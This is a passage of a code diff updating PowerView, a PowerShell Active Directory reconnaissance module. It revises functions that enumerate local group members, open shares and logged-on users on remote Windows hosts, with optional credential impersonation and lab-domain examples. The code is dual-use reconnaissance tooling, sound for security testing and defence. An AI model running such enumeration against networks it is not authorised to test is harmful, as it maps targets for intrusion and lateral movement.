+ $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value)
+ $Group | Add-Member Noteproperty 'Comment' ($LocalGroup.InvokeGet('Description'))
+ $Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT')
+ $Group
+ }
+ }
}
- else {
- # otherwise assume a single host name
- $Servers += $ComputerName | Get-NameField
+ }
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
}
+ }
+}
+
+
+function Get-NetLocalGroupMember {
+<#
+.SYNOPSIS
+
+Enumerates members of a specific local group on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Convert-ADName
+
+.DESCRIPTION
+
+This function will enumerate the members of a specified local group on the
+current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers
+will be used (for speed). Specifying "-Method WinNT" causes the WinNT service provider
+to be used instead, which returns a larger amount of information.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+.PARAMETER GroupName
+
+The local group name to query for users. If not given, it defaults to "Administrators".
+
+.PARAMETER Method
+
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to a remote machine. Only applicable with "-Method WinNT".
+
+.EXAMPLE
+
+Get-NetLocalGroupMember | ft
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False
+WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False
+WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True
+WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True
+
+.EXAMPLE
+
+Get-NetLocalGroupMember -Method winnt | ft
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False
+WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False
+WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True
+WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True
+
+.EXAMPLE
+
+Get-NetLocalGroup | Get-NetLocalGroupMember | ft
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False
+WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False
+WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True
+WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True
+WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... False False
+WINDOWS1 IIS_IUSRS NT AUTHORIT... S-1-5-17 False False
+WINDOWS1 Users NT AUTHORIT... S-1-5-4 False False
+WINDOWS1 Users NT AUTHORIT... S-1-5-11 False False
+WINDOWS1 Users WINDOWS1\lo... S-1-5-21-25... False UNKNOWN
+WINDOWS1 Users TESTLAB\Dom... S-1-5-21-89... True UNKNOWN
+
+.EXAMPLE
+
+Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+primary.tes... Administrators TESTLAB\Adm... S-1-5-21-89... False False
+primary.tes... Administrators TESTLAB\loc... S-1-5-21-89... False False
+primary.tes... Administrators TESTLAB\Ent... S-1-5-21-89... True False
+primary.tes... Administrators TESTLAB\Dom... S-1-5-21-89... True False
+
+.OUTPUTS
- # query the specified group using the WINNT provider, and
- # extract fields as appropriate from the results
- ForEach($Server in $Servers) {
+PowerView.LocalGroupMember.API
- if($API) {
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+.LINK
+
+http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.LocalGroupMember.API')]
+ [OutputType('PowerView.LocalGroupMember.WinNT')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = $Env:COMPUTERNAME,
+
+ [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $GroupName = 'Administrators',
+
+ [ValidateSet('API', 'WinNT')]
+ [Alias('CollectionMethod')]
+ [String]
+ $Method = 'API',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ if ($Method -eq 'API') {
# if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information
+
# arguments for NetLocalGroupGetMembers
$QueryLevel = 2
$PtrInfo = [IntPtr]::Zero
@@ -7748,12 +14058,12 @@ function Get-NetLocalGroup {
$ResumeHandle = 0
# get the local user information
- $Result = $Netapi32::NetLocalGroupGetMembers($Server, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+ $Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
- # Locate the offset of the initial intPtr
+ # locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
- $LocalUsers = @()
+ $Members = @()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
@@ -7770,23 +14080,22 @@ function Get-NetLocalGroup {
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
- $SidString = ""
+ $SidString = ''
$Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
- if($Result2 -eq 0) {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ if ($Result2 -eq 0) {
+ Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
else {
- $LocalUser = New-Object PSObject
- $LocalUser | Add-Member Noteproperty 'ComputerName' $Server
- $LocalUser | Add-Member Noteproperty 'AccountName' $Info.lgrmi2_domainandname
- $LocalUser | Add-Member Noteproperty 'SID' $SidString
-
+ $Member = New-Object PSObject
+ $Member | Add-Member Noteproperty 'ComputerName' $Computer
+ $Member | Add-Member Noteproperty 'GroupName' $GroupName
+ $Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname
+ $Member | Add-Member Noteproperty 'SID' $SidString
$IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup')
- $LocalUser | Add-Member Noteproperty 'IsGroup' $IsGroup
- $LocalUser.PSObject.TypeNames.Add('PowerView.LocalUserAPI')
-
- $LocalUsers += $LocalUser
+ $Member | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API')
+ $Members += $Member
}
}
@@ -7794,1450 +14103,1906 @@ function Get-NetLocalGroup {
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
# try to extract out the machine SID by using the -500 account as a reference
- $MachineSid = $LocalUsers | Where-Object {$_.SID -like '*-500'}
- $Parts = $MachineSid.SID.Split('-')
- $MachineSid = $Parts[0..($Parts.Length -2)] -join '-'
+ $MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID
+ if ($MachineSid) {
+ $MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-'))
- $LocalUsers | ForEach-Object {
- if($_.SID -match $MachineSid) {
- $_ | Add-Member Noteproperty 'IsDomain' $False
+ $Members | ForEach-Object {
+ if ($_.SID -match $MachineSid) {
+ $_ | Add-Member Noteproperty 'IsDomain' $False
+ }
+ else {
+ $_ | Add-Member Noteproperty 'IsDomain' $True
+ }
}
- else {
- $_ | Add-Member Noteproperty 'IsDomain' $True
+ }
+ else {
+ $Members | ForEach-Object {
+ if ($_.SID -notmatch 'S-1-5-21') {
+ $_ | Add-Member Noteproperty 'IsDomain' $False
+ }
+ else {
+ $_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN'
+ }
}
}
- $LocalUsers
+ $Members
}
else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+ Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
-
else {
# otherwise we're using the WinNT service provider
try {
- if($ListGroups) {
- # if we're listing the group names on a remote server
- $Computer = [ADSI]"WinNT://$Server,computer"
-
- $Computer.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {
- $Group = New-Object PSObject
- $Group | Add-Member Noteproperty 'Server' $Server
- $Group | Add-Member Noteproperty 'Group' ($_.name[0])
- $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier $_.objectsid[0],0).Value)
- $Group | Add-Member Noteproperty 'Description' ($_.Description[0])
- $Group.PSObject.TypeNames.Add('PowerView.LocalGroup')
- $Group
- }
- }
- else {
- # otherwise we're listing the group members
- $Members = @($([ADSI]"WinNT://$Server/$GroupName,group").psbase.Invoke('Members'))
-
- $Members | ForEach-Object {
-
- $Member = New-Object PSObject
- $Member | Add-Member Noteproperty 'ComputerName' $Server
-
- $AdsPath = ($_.GetType().InvokeMember('Adspath', 'GetProperty', $Null, $_, $Null)).Replace('WinNT://', '')
- $Class = $_.GetType().InvokeMember('Class', 'GetProperty', $Null, $_, $Null)
-
- # try to translate the NT4 domain to a FQDN if possible
- $Name = Convert-ADName -ObjectName $AdsPath -InputType 'NT4' -OutputType 'Canonical'
- $IsGroup = $Class -eq "Group"
+ $GroupProvider = [ADSI]"WinNT://$Computer/$GroupName,group"
- if($Name) {
- $FQDN = $Name.split("/")[0]
- $ObjName = $AdsPath.split("/")[-1]
- $Name = "$FQDN/$ObjName"
- $IsDomain = $True
- }
- else {
- $ObjName = $AdsPath.split("/")[-1]
- $Name = $AdsPath
- $IsDomain = $False
- }
+ $GroupProvider.psbase.Invoke('Members') | ForEach-Object {
- $Member | Add-Member Noteproperty 'AccountName' $Name
- $Member | Add-Member Noteproperty 'IsDomain' $IsDomain
- $Member | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $Member = New-Object PSObject
+ $Member | Add-Member Noteproperty 'ComputerName' $Computer
+ $Member | Add-Member Noteproperty 'GroupName' $GroupName
- if($IsDomain) {
- # translate the binary sid to a string
- $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($_.GetType().InvokeMember('ObjectSID', 'GetProperty', $Null, $_, $Null),0)).Value)
- $Member | Add-Member Noteproperty 'Description' ""
- $Member | Add-Member Noteproperty 'Disabled' ""
+ $LocalUser = ([ADSI]$_)
+ $AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '')
+ $IsGroup = ($LocalUser.SchemaClassName -like 'group')
- if($IsGroup) {
- $Member | Add-Member Noteproperty 'LastLogin' ""
- }
- else {
- try {
- $Member | Add-Member Noteproperty 'LastLogin' ( $_.GetType().InvokeMember('LastLogin', 'GetProperty', $Null, $_, $Null))
- }
- catch {
- $Member | Add-Member Noteproperty 'LastLogin' ""
- }
- }
- $Member | Add-Member Noteproperty 'PwdLastSet' ""
- $Member | Add-Member Noteproperty 'PwdExpired' ""
- $Member | Add-Member Noteproperty 'UserFlags' ""
- }
- else {
- # repull this user object so we can ensure correct information
- $LocalUser = $([ADSI] "WinNT://$AdsPath")
-
- # translate the binary sid to a string
- $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.objectSid.value,0)).Value)
- $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description[0])
-
- if($IsGroup) {
- $Member | Add-Member Noteproperty 'PwdLastSet' ""
- $Member | Add-Member Noteproperty 'PwdExpired' ""
- $Member | Add-Member Noteproperty 'UserFlags' ""
- $Member | Add-Member Noteproperty 'Disabled' ""
- $Member | Add-Member Noteproperty 'LastLogin' ""
- }
- else {
- $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))
- $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')
- $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )
- # UAC flags of 0x2 mean the account is disabled
- $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.userFlags.value -band 2) -eq 2)
- try {
- $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])
- }
- catch {
- $Member | Add-Member Noteproperty 'LastLogin' ""
- }
- }
- }
- $Member.PSObject.TypeNames.Add('PowerView.LocalUser')
- $Member
-
- # if the result is a group domain object and we're recursing,
- # try to resolve all the group member results
- if($Recurse -and $IsGroup) {
- if($IsDomain) {
- $FQDN = $Name.split("/")[0]
- $GroupName = $Name.split("/")[1].trim()
-
- Get-NetGroupMember -GroupName $GroupName -Domain $FQDN -FullData -Recurse | ForEach-Object {
-
- $Member = New-Object PSObject
- $Member | Add-Member Noteproperty 'ComputerName' "$FQDN/$($_.GroupName)"
-
- $MemberDN = $_.distinguishedName
- # extract the FQDN from the Distinguished Name
- $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
-
- $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype
-
- if ($_.samAccountName) {
- # forest users have the samAccountName set
- $MemberName = $_.samAccountName
- }
- else {
- try {
- # external trust users have a SID, so convert it
- try {
- $MemberName = Convert-SidToName $_.cn
- }
- catch {
- # if there's a problem contacting the domain to resolve the SID
- $MemberName = $_.cn
- }
- }
- catch {
- Write-Debug "Error resolving SID : $_"
- }
- }
-
- $Member | Add-Member Noteproperty 'AccountName' "$MemberDomain/$MemberName"
- $Member | Add-Member Noteproperty 'SID' $_.objectsid
- $Member | Add-Member Noteproperty 'Description' $_.description
- $Member | Add-Member Noteproperty 'Disabled' $False
- $Member | Add-Member Noteproperty 'IsGroup' $MemberIsGroup
- $Member | Add-Member Noteproperty 'IsDomain' $True
- $Member | Add-Member Noteproperty 'LastLogin' ''
- $Member | Add-Member Noteproperty 'PwdLastSet' $_.pwdLastSet
- $Member | Add-Member Noteproperty 'PwdExpired' ''
- $Member | Add-Member Noteproperty 'UserFlags' $_.userAccountControl
- $Member.PSObject.TypeNames.Add('PowerView.LocalUser')
- $Member
- }
- } else {
- Get-NetLocalGroup -ComputerName $Server -GroupName $ObjName -Recurse
- }
- }
+ if(([regex]::Matches($AdsPath, '/')).count -eq 1) {
+ # DOMAIN\user
+ $MemberIsDomain = $True
+ $Name = $AdsPath.Replace('/', '\')
+ }
+ else {
+ # DOMAIN\machine\user
+ $MemberIsDomain = $False
+ $Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\')
}
+
+ $Member | Add-Member Noteproperty 'AccountName' $Name
+ $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
+ $Member | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain
+
+ # if ($MemberIsDomain) {
+ # # translate the binary sid to a string
+ # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
+ # $Member | Add-Member Noteproperty 'Description' ''
+ # $Member | Add-Member Noteproperty 'Disabled' ''
+
+ # if ($IsGroup) {
+ # $Member | Add-Member Noteproperty 'LastLogin' ''
+ # }
+ # else {
+ # try {
+ # $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin')
+ # }
+ # catch {
+ # $Member | Add-Member Noteproperty 'LastLogin' ''
+ # }
+ # }
+ # $Member | Add-Member Noteproperty 'PwdLastSet' ''
+ # $Member | Add-Member Noteproperty 'PwdExpired' ''
+ # $Member | Add-Member Noteproperty 'UserFlags' ''
+ # }
+ # else {
+ # # translate the binary sid to a string
+ # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
+ # $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description)
+
+ # if ($IsGroup) {
+ # $Member | Add-Member Noteproperty 'PwdLastSet' ''
+ # $Member | Add-Member Noteproperty 'PwdExpired' ''
+ # $Member | Add-Member Noteproperty 'UserFlags' ''
+ # $Member | Add-Member Noteproperty 'Disabled' ''
+ # $Member | Add-Member Noteproperty 'LastLogin' ''
+ # }
+ # else {
+ # $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))
+ # $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')
+ # $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )
+ # # UAC flags of 0x2 mean the account is disabled
+ # $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2)
+ # try {
+ # $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])
+ # }
+ # catch {
+ # $Member | Add-Member Noteproperty 'LastLogin' ''
+ # }
+ # }
+ # }
+
+ $Member
}
}
catch {
- Write-Warning "[!] Error: $_"
+ Write-Verbose "[Get-NetLocalGroupMember] Error for $Computer : $_"
}
}
}
}
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
}
-filter Get-NetShare {
+
+function Get-NetShare {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function will execute the NetShareEnum Win32API call to query
- a given host for open shares. This is a replacement for
- "net share \\hostname"
+Returns open shares on the local (or a remote) machine.
- .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
- The hostname to query for shares. Also accepts IP addresses.
+.DESCRIPTION
- .OUTPUTS
+This function will execute the NetShareEnum Win32API call to query
+a given host for open shares. This is a replacement for "net share \\hostname".
- SHARE_INFO_1 structure. A representation of the SHARE_INFO_1
- result structure which includes the name and note for each share,
- with the ComputerName added.
+.PARAMETER ComputerName
- .EXAMPLE
+Specifies the hostname to query for shares (also accepts IP addresses).
+Defaults to 'localhost'.
- PS C:\> Get-NetShare
+.PARAMETER Credential
- Returns active shares on the local host.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetShare -ComputerName sqlserver
+Get-NetShare
- Returns active shares on the 'sqlserver' host
+Returns active shares on the local host.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetComputer | Get-NetShare
+Get-NetShare -ComputerName sqlserver
- Returns all shares for all computers in the domain.
+Returns active shares on the 'sqlserver' host
- .LINK
+.EXAMPLE
- http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
-#>
+Get-DomainComputer | Get-NetShare
- [CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
- [ValidateNotNullOrEmpty()]
- $ComputerName = 'localhost'
- )
+Returns all shares for all computers in the domain.
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
+.EXAMPLE
- # arguments for NetShareEnum
- $QueryLevel = 1
- $PtrInfo = [IntPtr]::Zero
- $EntriesRead = 0
- $TotalRead = 0
- $ResumeHandle = 0
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetShare -ComputerName sqlserver -Credential $Cred
- # get the share information
- $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+.OUTPUTS
- # Locate the offset of the initial intPtr
- $Offset = $PtrInfo.ToInt64()
+PowerView.ShareInfo
- # 0 = success
- if (($Result -eq 0) -and ($Offset -gt 0)) {
+A PSCustomObject representing a SHARE_INFO_1 structure, including
+the name/type/remark for each share, with the ComputerName added.
+
+.LINK
+
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+#>
- # Work out how much to increment the pointer by finding out the size of the structure
- $Increment = $SHARE_INFO_1::GetSize()
+ [OutputType('PowerView.ShareInfo')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
- # parse all the result structures
- for ($i = 0; ($i -lt $EntriesRead); $i++) {
- # create a new int ptr at the given offset and cast the pointer as our result structure
- $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
- $Info = $NewIntPtr -as $SHARE_INFO_1
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- # return all the sections of the structure
- $Shares = $Info | Select-Object *
- $Shares | Add-Member Noteproperty 'ComputerName' $Computer
- $Offset = $NewIntPtr.ToInt64()
- $Offset += $Increment
- $Shares
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
}
+ }
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # arguments for NetShareEnum
+ $QueryLevel = 1
+ $PtrInfo = [IntPtr]::Zero
+ $EntriesRead = 0
+ $TotalRead = 0
+ $ResumeHandle = 0
+
+ # get the raw share information
+ $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+
+ # locate the offset of the initial intPtr
+ $Offset = $PtrInfo.ToInt64()
+
+ # 0 = success
+ if (($Result -eq 0) -and ($Offset -gt 0)) {
+
+ # work out how much to increment the pointer by finding out the size of the structure
+ $Increment = $SHARE_INFO_1::GetSize()
+
+ # parse all the result structures
+ for ($i = 0; ($i -lt $EntriesRead); $i++) {
+ # create a new int ptr at the given offset and cast the pointer as our result structure
+ $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+ $Info = $NewIntPtr -as $SHARE_INFO_1
+
+ # return all the sections of the structure - have to do it this way for V2
+ $Share = $Info | Select-Object *
+ $Share | Add-Member Noteproperty 'ComputerName' $Computer
+ $Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo')
+ $Offset = $NewIntPtr.ToInt64()
+ $Offset += $Increment
+ $Share
+ }
- # free up the result buffer
- $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ # free up the result buffer
+ $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ }
+ else {
+ Write-Verbose "[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+ }
+ }
}
- else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
}
}
-filter Get-NetLoggedon {
+function Get-NetLoggedon {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function will execute the NetWkstaUserEnum Win32API call to query
- a given host for actively logged on users.
+Returns users logged on the local (or a remote) machine.
+Note: administrative rights needed for newer Windows OSes.
- .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
- The hostname to query for logged on users.
+.DESCRIPTION
- .OUTPUTS
+This function will execute the NetWkstaUserEnum Win32API call to query
+a given host for actively logged on users.
- WKSTA_USER_INFO_1 structure. A representation of the WKSTA_USER_INFO_1
- result structure which includes the username and domain of logged on users,
- with the ComputerName added.
+.PARAMETER ComputerName
- .EXAMPLE
+Specifies the hostname to query for logged on users (also accepts IP addresses).
+Defaults to 'localhost'.
- PS C:\> Get-NetLoggedon
+.PARAMETER Credential
- Returns users actively logged onto the local host.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetLoggedon -ComputerName sqlserver
+Get-NetLoggedon
- Returns users actively logged onto the 'sqlserver' host.
+Returns users actively logged onto the local host.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetComputer | Get-NetLoggedon
+Get-NetLoggedon -ComputerName sqlserver
- Returns all logged on userse for all computers in the domain.
+Returns users actively logged onto the 'sqlserver' host.
- .LINK
+.EXAMPLE
- http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
-#>
+Get-DomainComputer | Get-NetLoggedon
- [CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
- [ValidateNotNullOrEmpty()]
- $ComputerName = 'localhost'
- )
+Returns all logged on users for all computers in the domain.
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
+.EXAMPLE
- # Declare the reference variables
- $QueryLevel = 1
- $PtrInfo = [IntPtr]::Zero
- $EntriesRead = 0
- $TotalRead = 0
- $ResumeHandle = 0
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
- # get logged on user information
- $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+.OUTPUTS
- # Locate the offset of the initial intPtr
- $Offset = $PtrInfo.ToInt64()
+PowerView.LoggedOnUserInfo
- # 0 = success
- if (($Result -eq 0) -and ($Offset -gt 0)) {
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
- # Work out how much to increment the pointer by finding out the size of the structure
- $Increment = $WKSTA_USER_INFO_1::GetSize()
+.LINK
- # parse all the result structures
- for ($i = 0; ($i -lt $EntriesRead); $i++) {
- # create a new int ptr at the given offset and cast the pointer as our result structure
- $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
- $Info = $NewIntPtr -as $WKSTA_USER_INFO_1
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+#>
- # return all the sections of the structure
- $LoggedOn = $Info | Select-Object *
- $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
- $Offset = $NewIntPtr.ToInt64()
- $Offset += $Increment
- $LoggedOn
+ [OutputType('PowerView.LoggedOnUserInfo')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
}
+ }
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # declare the reference variables
+ $QueryLevel = 1
+ $PtrInfo = [IntPtr]::Zero
+ $EntriesRead = 0
+ $TotalRead = 0
+ $ResumeHandle = 0
+
+ # get logged on user information
+ $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+
+ # locate the offset of the initial intPtr
+ $Offset = $PtrInfo.ToInt64()
+
+ # 0 = success
+ if (($Result -eq 0) -and ($Offset -gt 0)) {
+
+ # work out how much to increment the pointer by finding out the size of the structure
+ $Increment = $WKSTA_USER_INFO_1::GetSize()
+
+ # parse all the result structures
+ for ($i = 0; ($i -lt $EntriesRead); $i++) {
+ # create a new int ptr at the given offset and cast the pointer as our result structure
+ $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+ $Info = $NewIntPtr -as $WKSTA_USER_INFO_1
+
+ # return all the sections of the structure - have to do it this way for V2
+ $LoggedOn = $Info | Select-Object *
+ $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
+ $LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo')
+ $Offset = $NewIntPtr.ToInt64()
+ $Offset += $Increment
+ $LoggedOn
+ }
